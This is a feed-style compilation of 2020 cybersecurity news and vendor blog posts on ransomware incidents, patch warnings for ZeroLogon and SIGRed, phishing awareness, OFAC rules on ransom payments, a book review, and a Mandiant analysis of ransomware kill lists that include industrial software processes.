COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of University and Colleges in September.  Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack their victims, and behind leaking online documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom payment was not paid. In a statement, the university said "it will take several weeks" to address the issues, and that many IT services will not be operating during this period", that statement is the hallmark of recovery from a mass ransomware infection.

Doppelpaymer Ransom notice

On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks is available here.

Across the pond, healthcare giant Universal Heather Services (UHS), which operates nearly 400 hospitals and clinics, was said to be severely disrupted by the Ryuk ransomware. According to Bleeping Computer, a UHS employee said encrypted files had the telltale .ryk extension, while another employee described a ransom note fitted the Ryuk ransomware demand note. A Reddit thread claimed “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center. Ambulances are being rerouted to other hospitals, the information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment. Four people died tonight alone due to the waiting on results from the lab to see what was going on”. In response, UHS released a statement which said, “We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods".

'Dark Overlord', the handle of a British hacker involved in the theft of information as part of "The Overlord" hacking group was jailed for five years in the United States and ordered to pay $1.5 million in restitution, after pleading guilty to conspiring to commit aggravated identity theft and computer fraud, in other words, orchestrating cyber exportation attacks against US firms.


ZeroLogon:  IT Support Staff must Patch Now!
A critical Microsoft Windows Server Domain Controller vulnerability (CVE-2020-1472) is now causing concern for IT staff, after the Microsoft, CISA, the UK NCSC, and other security bodies warned the vulnerability was being actively exploited in mid-September. Dubbed 'Zerologon', Microsoft issued a security fix for the bug, which scored a maximum criticality rate of 10.0, as part of their August 2020 'Patch Tuesday' release of monthly security updates. Since that public disclosure of the flaw, there have been multiple proofs-of-concept (PoC) exploits appearing on the internet, which threat actors are now adapting into their cyberattacks. There are no mitigation or workarounds for this vulnerability, so it is essential for the CVE-2020-1472 security update is installed on all Microsoft Windows Domain Controllers, and then ensure DC enforcement mode is enabled. 

Stay safe and secure.

BLOG

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Ransomware Victims That Pay Up Could Incur Steep Fines from Uncle Sam

        Companies victimized by ransomware and firms that facilitate negotiations with ransomware extortionists could face steep fines from the U.S. federal government if the crooks who profit from the attack are already under economic sanctions, the Treasury Department warned today.

        Image: Shutterstock

        In its advisory (PDF), the Treasury’s Office of Foreign Assets Control (OFAC) said “companies that facilitate ransomware payments to cyber actors on behalf of victims, including financial institutions, cyber insurance firms, and companies involved in digital forensics and incident response, not only encourage future ransomware payment demands but also may risk violating OFAC regulations.”

        As financial losses from cybercrime activity and ransomware attacks in particular have skyrocketed in recent years, the Treasury Department has imposed economic sanctions on several cybercriminals and cybercrime groups, effectively freezing all property and interests of these persons (subject to U.S. jurisdiction) and making it a crime to transact with them.

        A number of those sanctioned have been closely tied with ransomware and malware attacks, including the North Korean Lazarus Group; two Iranians thought to be tied to the SamSam ransomware attacks; Evgeniy Bogachev, the developer of Cryptolocker; and Evil Corp, a Russian cybercriminal syndicate that has used malware to extract more than $100 million from victim businesses.

        Those that run afoul of OFAC sanctions without a special dispensation or “license” from Treasury can face several legal repercussions, including fines of up to $20 million.

        The Federal Bureau of Investigation (FBI) and other law enforcement agencies have tried to discourage businesses hit by ransomware from paying their extortionists, noting that doing so only helps bankroll further attacks.

        But in practice, a fair number of victims find paying up is the fastest way to resume business as usual. In addition, insurance providers often help facilitate the payments because the amount demanded ends up being less than what the insurer might have to pay to cover the cost of the affected business being sidelined for days or weeks at a time.

        While it may seem unlikely that companies victimized by ransomware might somehow be able to know whether their extortionists are currently being sanctioned by the U.S. government, they still can be fined either way, said Ginger Faulk, a partner in the Washington, D.C. office of the law firm Eversheds Sutherland.

        Faulk said OFAC may impose civil penalties for sanctions violations based on “strict liability,” meaning that a person subject to U.S. jurisdiction may be held civilly liable even if it did not know or have reason to know it was engaging in a transaction with a person that is prohibited under sanctions laws and regulations administered by OFAC.

        “In other words, in order to be held liable as a civil (administrative) matter (as opposed to criminal), no mens rea or even ‘reason to know’ that the person is sanctioned is necessary under OFAC regulations,” Faulk said.

        But Fabian Wosar, chief technology officer at computer security firm Emsisoft, said Treasury’s policies here are nothing new, and that they mainly constitute a warning for individual victim firms who may not already be working with law enforcement and/or third-party security firms.

        Wosar said companies that help ransomware victims negotiate lower payments and facilitate the financial exchange are already aware of the legal risks from OFAC violations, and will generally refuse clients who get hit by certain ransomware strains.

        “In my experience, OFAC and cyber insurance with their contracted negotiators are in constant communication,” he said. “There are often even clearing processes in place to ascertain the risk of certain payments violating OFAC.”

        Along those lines, OFAC said the degree of a person/company’s awareness of the conduct at issue is a factor the agency may consider in assessing civil penalties. OFAC said it would consider “a company’s self-initiated, timely, and complete report of a ransomware attack to law enforcement to be a significant mitigating factor in determining an appropriate enforcement outcome if the situation is later determined to have a sanctions nexus.”

        Ransom from Home – How to close the cyber front door to remote working ransomware attacks

        Coronavirus has caused a major shift to our working patterns. In many cases these will long outlast the pandemic. But working from home has its own risks. One is that you may invite ransomware attacks from a new breed of cyber-criminal who has previously confined his efforts to directly targeting the corporate network. Why? Because as a remote worker, you’re increasingly viewed as a soft target—the open doorway to extorting money from your employer.

        So how does ransomware land up on your front doorstep? And what can a home worker do to shut that door?

        The new ransomware trends

        Last year, Trend Micro detected over 61 million ransomware-related threats, a 10% increase from 2018 figures. But things have only gotten worse from there. There has been a 20% spike in ransomware detections globally in the first half of 2020, rising to 109% in the US. And why is that?

        At a basic level, ransomware searches for and encrypts most of the files on a targeted computer, so as to make them unusable. Victims are then asked to pay a ransom within a set time frame in order to receive the decryption key they need to unlock their data. If they don’t, and they haven’t backed-up this data, it could be lost forever.

        The trend of late, however, has been to focus on public and private sector organizations whose staff are working from home (WFH). The rationale is that remote workers are less likely to be able to defend themselves from ransomware attacks, while they also provide a useful stepping-stone into high-value corporate networks. Moreover, cybercriminals are increasingly looking to steal sensitive data before they encrypt it, even as they’re more likely to fetch a higher ransom for their efforts than they do from a typical consumer, especially if the remote employee’s data is covered by cyber-insurance.

        Home workers are also being more targeted for a number of reasons:

        • They may be more distracted than those in the office.
        • Home network and endpoint security may not be up to company levels.
        • Home systems (routers, smart home devices, PCs, etc.,) may not be up-to-date and therefore are more easily exposed to exploits.
        • Remote workers are more likely to visit insecure sites, download risky apps, or share machines/networks with those who do.
        • Corporate IT security teams may be overwhelmed with other tasks and unable to provide prompt support to a remote worker.
        • Security awareness programs may have been lacking in the past, perpetuating bad practice for workers at home.

        What’s the attack profile of the remote working threat?

        In short, the bad guys are now looking to gain entry to the corporate network you may be accessing from home via a VPN, or to the cloud-hosted systems you use for work or sharing files, in order to first steal and then encrypt company data with ransomware as far and wide as possible into your organization. But the methods are familiar. They’ll

        • Try to trick you into dangerous behavior through email phishing—the usual strategy of getting you to click links that redirect you to bad websites that house malware, or getting you to download a bad file, to start the infection process.
        • Steal or guess your log-ins to work email accounts, remote desktop tools (i.e., Microsoft Remote Desktop or RDP), and cloud-based storage/networks, etc., before they deliver the full ransomware payload. This may happen via a phishing email spoofed to appear as if sent from a legitimate source, or they may scan for your use of specific tools and then try to guess the password (known as brute forcing). One new Mac ransomware, called EvilQuest, has a keylogger built into it, which could capture your company passwords as you type them in. It’s a one-two punch: steal the data first, then encrypt it.
        • Target malware at your VPN or remote desktop software, if it’s vulnerable. Phishing is again a popular way to do this, or they may hide it in software on torrent sites or in app stores. This gives them a foothold into your employer’s systems and network.
        • Target smart home devices/routers via vulnerabilities or their easy-to-guess/crack passwords, in order to use home networks as a stepping-stone into your corporate network.

        How can I prevent ransomware when working from home?

        The good news is that you, the remote worker, can take some relatively straightforward steps up front to help mitigate the cascading risks to your company posed by the new ransomware. Try the following:

        • Be cautious of phishing emails. Take advantage of company training and awareness courses if offered.
        • Keep your home router firmware, PCs, Macs, mobile devices, software, browsers and operating systems up to date on the latest versions – including remote access tools and VPNs (your IT department may do some of this remotely).
        • Ensure your home network, PCs, and mobile devices are protected with up-to-date with network and endpoint AV from a reputable vendor. (The solutions should include anti-intrusion, anti-web threat, anti-spam, anti-phishing, and of course, anti-ransomware features.)
        • Ensure remote access tools and user accounts are protected with multi-factor authentication (MFA) if used and disable remote access to your home router.
        • Disable Microsoft macros where possible. They’re a typical attack vector.
        • Back-up important files regularly, according to 3-2-1 rule.

        How Trend Micro can help

        In short, to close the cyber front door to ransomware, you need to protect your home network and all your endpoints (laptops, PCs, mobile devices) to be safe. Trend Micro can help via

        • The Home Network: Home Network Security (HNS) connects to your router to protect any devices connected to the home network — including IoT gadgets, smartphones and laptops — from ransomware and other threats.
        • Desktop endpoints: Trend Micro Security (TMS) offers advanced protection from ransomware-related threats. It includes Folder Shield to safeguard valuable files from ransomware encryption, which may be stored locally or synched to cloud services like Dropbox®, Google Drive® and Microsoft® OneDrive/OneDrive for Business.
        • Mobile endpoints: Trend Micro Mobile Security (also included in TMS) protects Android and iOS devices from ransomware.
        • Secure passwords: Trend Micro Password Manager enables users to securely store and recall strong, unique passwords for all their apps, websites and online accounts, across multiple devices.
        • VPN Protection at home and on-the-go: Trend Micro’s VPN Proxy One (Mac | iOS) solution will help ensure your data privacy on Apple devices when working from home, while its cross-platform WiFi Protection solution will do the same across PCs, Macs, Android and iOS devices when working from home or when connecting to public/unsecured WiFi hotspots, as you venture out and about as the coronavirus lockdown eases in your area.

        With these tools, you, the remote worker, can help shut the front door to ransomware, protecting your work, devices, and company from data theft and encryption for ransom.

        The post Ransom from Home – How to close the cyber front door to remote working ransomware attacks appeared first on .

        Phishing attacks: 6 reasons why we keep taking the bait

        Phishing scams are among the most common and dangerous type of attack that organisations face.

        Indeed, Verizon’s Data Breach Digest found that 90% of all data breaches involve phishing.

        But what makes these attacks so successful? An Osterman Research report suggests there are six causes of phishing.


        1. Users are the weakest link

        Even if most of us think we would be able to spot a phishing scam when we receive one, it only takes a momentary lapse in judgement for us to fall victim.

        The panic one experience when they receive a message claiming that, for example, there has been suspicious activity on the recipient’s account will in many cases cause people to overlook signs that the message is malicious.

        But by that point it’s too late, with the victim already clicking links, opening attachments and handing over their username and password.

        The good news is this is a weakness that organisations and individuals have the power to address. All they have to do learn about the way phishing works and the clues to look out for.

        Unfortunately, most users don’t receive the necessary training. Indeed, researchers have found that 52% of users receive training no more than twice per year, and 6% of users have never received security awareness training.

        The result? IT departments are not at all confident in their users’ ability to recognise incoming threats, or in their organisation’s ability to stop phishing campaigns and related attacks.


        2. Organisations aren’t doing enough

        Staff awareness training isn’t the only step that organisations can take to better protect themselves from phishing scams.

        The report highlights three key areas of weakness:

        • Insufficient backup processes

        In the event of a ransomware attack, most organisations have insufficient backup processes. This leaves them unable to quickly restore content on servers, user workstations and other endpoints to a healthy state.

        • Lack of user testing

        Most organisations do not have adequate procedures in place to test their users, leaving them unable to determine which staff members are the most susceptible to an attack.

        Conducting a simulated phishing attack can help you establish whether your employees are vulnerable to phishing emails, enabling you to take immediate remedial action to improve your cyber security posture.

        • BYOD security risks

        Many organisations lack a BYOD (Bring Your Own Device) policy, meaning that, should a cyber criminal compromise an employee’s device, they will be able to gain access to sensitive data not only on that device but to leverage their access across the network.


        3. Criminal organisations are well funded

        The massive success that cyber criminals have had in recent years means they have plenty of funds to invest in scams.

        As such, they can invest in technical resources to root out make their scams run more efficiently – whether that’s in the number of scams they can send, the authenticity of their bogus messages or the complexity of their campaigns.

        It’s also enabled cyber criminals to branch out into new attack vectors. For example, there has been a significant increase in social media in recent years.

        This is particularly dangerous, because most advice about phishing relates to email-based scams – or, occasionally, to phone scams (‘vishing’). People are therefore less likely to spot the techniques that fraudsters use on social media.


        4. Cyber criminals are shifting their focus

        The availability of stolen data on the dark web has decreased its commercial value.

        Scammers can now buy payment card data on the dark web for as little as $9 (about £6.80), so there’s less profit to be had for those stealing and selling this information.

        In response, cyber criminals have changed tactics, looking to make money through organisations directly thanks to ransomware attacks.

        These types of attack are no more complicated for a cyber criminal to pull off, but the rewards can be much greater.

        Although experts warn organisations not to pay ransoms, it’s certainly tempting to wire transfer a lump sum in the hopes that you’ll get your systems back online rather than face the headaches that come with incident response.


        5. Phishing tools are low-cost and widespread

        There are an increasing number of tools that are designed to help amateurs with little IT knowledge get into the cyber crime industry.

        The availability of phishing kits and the rise of ransomware-as-a-service has resulted in an explosion of ransomware and other exploits coming from an ever growing network of amateur cyber criminals.


        6. Malware is becoming more sophisticated

        Over time, phishing and various types of malware have become more sophisticated.

        The problems of phishing, spear-phishing, CEO fraud, business email compromise and ransomware are simply going to get worse without appropriate solutions and processes to defend against them.


        Protect your organisation against phishing

        Educated and informed employees are your first line of defence. Empower them to make better security decisions with our complete staff awareness e-learning suite.

        A cost-effective way of managing all your staff awareness training in one place, the complete suite contains eight e-learning courses to help you transform your employees from threats to assets.

        Find out more

        A version of this blog was originally published on 27 March 2017.

        The post Phishing attacks: 6 reasons why we keep taking the bait appeared first on IT Governance UK Blog.

        Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure

        Cybercriminals tend to keep with the times, as they often leverage current events as a way to harvest user data or spread malicious content. McAfee COVID-19 Threat Report July 2020 points to a rather significant surge in attacks exploiting the current pandemic with COVID-19 themed malicious apps, phishing campaigns, malware, and ransomware. However, what many users don’t realize is that ransomware attacks are a lot more than meets the eye.  

        COVID-19 Themed Ransomware

        During the first few months of 2020, the McAfee Advanced Threat Research (ATR) team saw that cybercriminals were targeting manufacturing, law, and construction businessesAfter pinpointing their targets, hackers spread COVID-19 themed ransomware campaigns to these companies in an effort to capitalize on their relevancy during this time 

        An example of one of these attacks in action is Ransomware-GVZ. Ransomware-GVZ displays a ransom note demanding payment in return for decrypting the firm’s compromised systems and the personal and corporate data they contain. The ransomware then encrypts the organization’s files and displays a lock screen if a user attempts to reboot their device. As a result, the company is left with a severely crippled network while the criminals behind the attack gain a treasure trove of data – information belonging to consumers that have previously interacted with the business.   

         

        Ransomware Could Be the New Data Breach

        As ransomware attacks continue to evolve, it’s not just file encryption that users need to be aware of – they also need to be aware of the impact the attack has on compromised data. Senior Principal Engineer and Lead Scientist Christiaan Beek stated, “No longer can we call these attacks just ransomware incidents. When actors have access to the network and steal the data prior to encrypting it, threatening to leak if you don’t pay, that is a data [infraction].” If a ransomware attack exploits an organization and their network is compromised, so is the data on that network. Hackers can steal this data before encrypting it and use this stolen information to conduct identity theft or spread other misfortune that can affect both the organization’s employees and their customers.  

        This surge in ransomware is only compounded by traditional data infringements  which have also spiked in conjunction with the global pandemic. According to the McAfee COVID-19 Threat Report July 2020, the number of reported incidents targeting the public sector, individuals, education, and manufacturing dramatically increased. In fact, McAfee Labs counted 458 publicly disclosed security incidents in the few months of 2020, with a 60% increase in attacks from Q4 2019 to Q1 2020 in the United States alone. Coincidentally, the attacks targeting organizations also impact the consumers who buy from them, as the company’s data consists of their customer’s personal and financial information.  

        Don’t Let Your Data Be Taken for Ransom

        Because of the high volume of data that’s compromised by ransomware attacks, it’s crucial for consumers to shift how they approach these threats and respond in a similar way that they would a data incidentLuckily, there are actionable steps you can take as a consumer to help secure your data.  

        Change your credentials

        If you discover that a data leak or a ransomware attack has compromised a company you’ve interacted with, err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks. 

        Take password protection seriously

        When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials. 

        Enable two-factor or multi-factor authentication

        Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

        If you are targeted, never pay the ransom

        It’s possible that you could be targeted individually by a ransomware campaign. If this happens, don’t pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments. 

        Use a comprehensive security solution

        Adding an extra layer of security with a solution such as McAfee® Total Protection, which includes Ransom Guard, can help protect your devices from these cyberthreats.  

        Stay Updated

        To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?,  and ‘Like’ us on  Facebook. 

        The post Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure appeared first on McAfee Blogs.

        Book Review: Crime Dot Com, From Viruses to Vote Rigging, How Hacking Went Global

        I had the great delight of reading Geoff White’s new book, “Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises.
        Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
        In Crime Dot Com Geoff takes the reader on a global historic tour of the shadowy cybercriminal underworld, from the humble beginnings with a rare interview with the elusive creator of the ‘Love Bug’ email worm, which caused havoc and panic back in 2000, right up to the modern-day alarming phenomenal of elections hacking by nation-state actors.

        The book tells the tales of the most notorious hacks in recent history, explaining how they were successfully planned and orchestrated, all wonderfully written in a plain English style that my Luddite mother-in-law can understand.  Revealing why cybercrime is not just about the Hollywood stereotypical lone hacker, eagerly tapping away on a keyboard in the dark finding ingenious ways of exploiting IT systems. But is really about society obscured online communities of likeminded individuals with questionable moral compasses, collaborating, and ultimately exploiting innocent victims people out of billions of pounds.

        The book covers the UK’s most notorious cyberattacks, such as the devasting 2017 WannaCry ransomware worm attack on the NHS, and the infamous TalkTalk hack carried out by teenage hackers.  Delving beyond the media 'cyber scare' headlines of the time, to bring the full story of what happened to the reader. The book also explores the rise and evolution of the Anonymous hacktivist culture and takes a deep dive into the less savoury aspects of criminal activities occurring on the dark web.

        As you read about the history of cybercrime in this book, a kind of symbiosis between cybercriminals and nation-state hackers activities becomes apparent, from Russian law enforcement turning a blind-eye to Russia cybercriminals exploiting the West, to both the NSA’s and North Korea’s alleged involvement in creating the heinous WannaCry ransomware worm, and the UK cybercriminal that disabled that attack.  The growing number of physical world impacts caused by cyber-attacks are also probed in Crime Dot Com, so-called ‘kinetic warfare’. How sophisticated malware called Stuxnet, attributed by the media as United States military created, was unleashed with devastating effect to physically cripple an Iranian nuclear power station in a targeted attack, and why the latest cyber threat actors are targeting Britain’s energy network.

        While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.
        5 out of 5: A must-read for anyone with an interest in cybercrime

        Cyber Security Roundup for August 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

        The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
        Twitter confirms internal tools used in bitcoin-promoting attack ...
        Scam Tweet
        The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer's Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every 'blue tick' verified Twitter user from tweeting, including me

        While the Twitter hack and scam dominated media headlines around the world, the attack was not the 'highly sophisticated cyber-attack' as reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their Twitter privilege account credentials out of them, which in turn gave the attackers access to Twitter's backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack, that scammer(s) orchestrated a near-simultaneous Bitcoin scam tweets to be posted from the high profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year British man from Bognor Regis.

        There was a very serious critical Windows vulnerability disclosed as part the July 2020 Microsoft 'Patch Tuesday' security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in Windows Domain Name System (DNS), a component commonly present in Microsoft Windows Server 2008, 2012, 2012R2, 2016 and 2019. Disclosed as CVE-2020-1350 it was given the highest possible CVSS score of 10.0, which basically means the vulnerability is “easy to attack” and “likely to be exploited”, although Microsoft said they hadn't seen any evidence of its exploitation at the time of their patch release.

        Given SIGRed is a wormable vulnerability, it makes it particularly dangerous, as wormable malware could exploit the vulnerability to rapidly spread itself over flat networks without any user interaction, as per the WannaCry attack on the NHS and other large organisations. Secondly, it could be used to exploit privilege level accounts (i.e. admin accounts found on Servers).  The Microsoft CVE-2020-1350 vulnerability can be mitigated on effected systems by either applying the Microsoft Windows DNS Server Microsoft released patch (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350 or by applying a Registry Workaround (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability)

        At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

        As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027, and banning their purchase of Huawei 5G network equipment after 31st December 2020.  Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, which Huawei continues to resolutely deny. The ban is expected to delay the UK's 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said. 
        In some media quarters, it was suggested the UK u-turn on Huawei could lead to cyberattack repercussions after Reuter's said its sources confirmed China was behind cyberattacks on Australia's critical national infrastructure and government institutions following their trade dispute with China.

        Russian Hacking Group (APT 29) was jointly accused of targeting the theft of coronavirus vaccine research by the UK NCSC, the Canadian Communication Security Establishment (CSE), United States Department for Homeland Security (DHS), Cyber-security Infrastructure Security Agency (CISA) and the US National Security Agency (NSA). The UK's National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia's ambassador to the UK has rejected allegations, "I don't believe in this story at all, there is no sense in it," Andrei Kelin told the BBC's Andrew Marr Show. While Foreign Secretary Dominic Raab said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour". 

        UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director's email account during a player transfer negotiation, the million-pound theft was only thwarted by a last-minute intervention by a bank.  Another English football club was targeted by a ransomware attack which stopped its turnstiles and CCTV systems from working, which nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising emails, cyber-enabled fraud and ransomware to shutting down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

        Smartwatch maker Garmin, had their website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand had been hit by the WastedLocker ransomware strain, which is said to have been developed by individuals linked to a Russia-based hacking group called 'Evil Corp'.  According to Bleeping Computer, Garmin paid $10 million to cybercriminals to receive decryption keys for the malware on 24th or 25th July 2020.

        Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers, one million files of Fitness Brand 'V Shred' was discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly V Shred defended the researcher findings by claiming it was necessary for user files to be publicly available and denied that any PII data had been exposed.

        BLOG

        NEWS
        VULNERABILITIES AND SECURITY UPDATES
        AWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families

        Mandiant Threat Intelligence has researched and written extensively on the increasing financially motivated threat activity directly impacting operational technology (OT) networks. Some of this research is available in our previous blog posts on industrial post-compromise ransomware and FireEye's approach to OT security. While most of the actors behind this activity likely do not differentiate between IT and OT or have a particular interest in OT assets, they are driven by the goal of making money and have demonstrated the skills needed to operate in these networks. For example, the shift to post-compromise ransomware deployment highlights the actors’ ability to adapt to more complex environments.

        In this blog post we look further into this trend by examining two different process kill lists containing OT processes which we have observed deployed alongside a variety of ransomware samples and families. We think it is likely that these lists were the result of coincidental asset scanning in victim organizations and not specific targeting of OT. While this judgement may initially seem like good news to defenders, this activity still indicates that multiple, very prolific, financially motivated threat actors are active inside organizations’ OT—based on the contents of these process kill lists—with the intent of profiting from the ransom of stolen information and disrupted services.

        Two Unique Process Kill Lists Deployed Alongside Seven Ransomware Families Include OT Processes

        Threat actors often deploy process kill lists alongside or as part of ransomware to terminate anti-virus products, stop alternative detection mechanisms, and remove file locks to ensure critical data is encrypted. As a result, the deployment of these lists increases the likelihood of a successful attack (MITRE ATT&CK T1489). In post compromise ransomware attacks, attackers regularly tailor the lists to include processes that are relevant to the victim’s environment. By stopping these processes, the attacker makes sure to encrypt data from critical systems, which may remain unaffected if the process is currently in use. As the likelihood of crippling critical systems increases, the target is more likely to suffer impacts on its physical production.

        First Process Kill List Has Been Leveraged By At Least Six Ransomware Families

        Mandiant identified samples of at least six ransomware families (DoppelPaymer, LockerGoga, Maze, MegaCortex, Nefilim and SNAKEHOSE)—all of which have been associated with high-profile incidents impacting industrial organizations over the past two years—that have leveraged a common process kill list containing 1,000+ processes. The list, which we briefly discussed in an earlier blog post from February 2020, includes a couple dozen processes related to OT executables—mainly from General Electric Proficy, a suite used for historians and human-machine interfaces (HMIs). We note, that while the inclusion of these processes in this kill list could result in limited loss of view of historical process data, it is not likely to directly impact the operator’s ability to control the physical process itself.


        Figure 1: Snippets from “kill.bat” deployed alongside LockerGoga (L) and MegaCortex process kill list (R)

        The earliest iteration we identified of the shared kill list was a batch script deployed alongside LockerGoga (MD5: 34187a34d0a3c5d63016c26346371b54) in January 2019 (Figure 1). Other iterations of the list we have observed are also hardcoded directly into the ransomware binaries. The different techniques used to deploy the process kill list, the use of different malware families, and slight variations between each list iteration (mainly typos in the processes, e.g.: a2guard.exea2start.exe; nexe; proficyclient.exe) indicate that likely more than one actor had access to the true source of the process kill list. This source could be for example a post of processes shared on a dark web forum, or an independent actor sharing the compiled list with other actors.

        We think it is likely that the OT processes identified in this list simply represent the coincidental output of automated process collection from victim environment(s) and not a targeted effort to impact OT. This is supported by the relatively limited and specific selection of OT-related processes, rather than a broader selection of many vendors and OT-related processes that would have been suggestive of targeted external research. Regardless, this does not downplay the significance of the inclusion of OT processes in the list, as it suggests that sophisticated financially motivated actors, such as FIN6, have had at least some visibility into a victim’s OT network. As a result, the actors were able to tailor their malware to impact those systems, without the explicit intent to target OT assets.

        Most types of ransomware attacks in OT environments will result in the disruption of services and a temporary loss of view into current and historical process data. However, OT environments impacted by a ransomware that leverages this kill list and happen to be running one or more of the processes used by the initial victim(s)—and therefore are included on the list—may face additional impacts. For example, historian databases would be more likely to be encrypted, possibly resulting in loss of historical data. Other impacts could include gaps in the collection of process data corresponding to the duration of the outage and temporary loss of access to licensing rights for critical services.

        Second List Deployed Alongside CLOP Ransomware Sample Has a Higher Chance of Impacting OT Systems

        Mandiant analyzed a second, entirely unrelated sample of ransomware (MD5: 3b980d2af222ec909b948b6bbdd46319) from the CLOP family with a hardcoded list for enumeration and termination of processes that includes a number of OT strings. The list contains over 1,425 processes, from which at least 150 belong to OT-related software suites (Figure 2 and Appendix).

        Based on our analysis, the CLOP malware family’s process kill list has grown over time possibly as more processes are scanned during different compromises. While we do not currently hold enough information to describe the exact mechanism used by the actor to grow the list, it appears to have resulted from actor reconnaissance across multiple victims. We have observed the threat actor employing process discovery procedures, including running the tasklist utility. This indicates that the actor scanned for processes in at least one victim’s OT network(s) before deploying the ransomware.


        Figure 2: Subset of processes in observed CLOP sample

        CLOP is also interesting as we have only observed a single unique and very prolific financially motivated threat actor leveraging the malware family. The group, who has been active since at least 2016 and potentially as early as 2014, is known for operating large phishing campaigns to distribute malware and typically monetizes intrusions through ransomware deployment. As highlighted by their versatility and long history in financially motivated intrusions, the actor’s activity in OT networks is likely no more than an additional step in the process for monetization. However, the financial motivations of the actor again do not imply low risk to OT. Instead, our analysis of the CLOP sample’s kill list indicates that the included processes actually have greater potential to disrupt OT systems than those included in the shared list described above.

        Unlike the first kill list, the CLOP sample includes a list of processes that, if stopped, may directly impact the operator’s ability to both visualize and control production. This is especially true in the case of some included processes that support HMI and PLC supervision. Some of the OT processes present in the CLOP sample are related to the following products:

        Vendor

        Product

        Description

        Siemens

        SIMATIC WinCC

        SCADA system, common for process control and automation.

        Beckhoff

        TwinCAT

        Software for PC-based process control and automation.

        National Instruments

        Data Acquisition Software (DAQ)

        Software used to acquire data from sensors and conditioning devices.

        Kepware

        KEPServer EX

        Software platform that collects information from industrial devices and sends the output to SCADA applications.

        OPC Unified Architecture (OPC-UA)

        N/A

        Communication protocol for data acquisition and exchange between industrial equipment and enterprise systems. 

        Table 1: Examples of products related to OT processes included in identified CLOP kill list

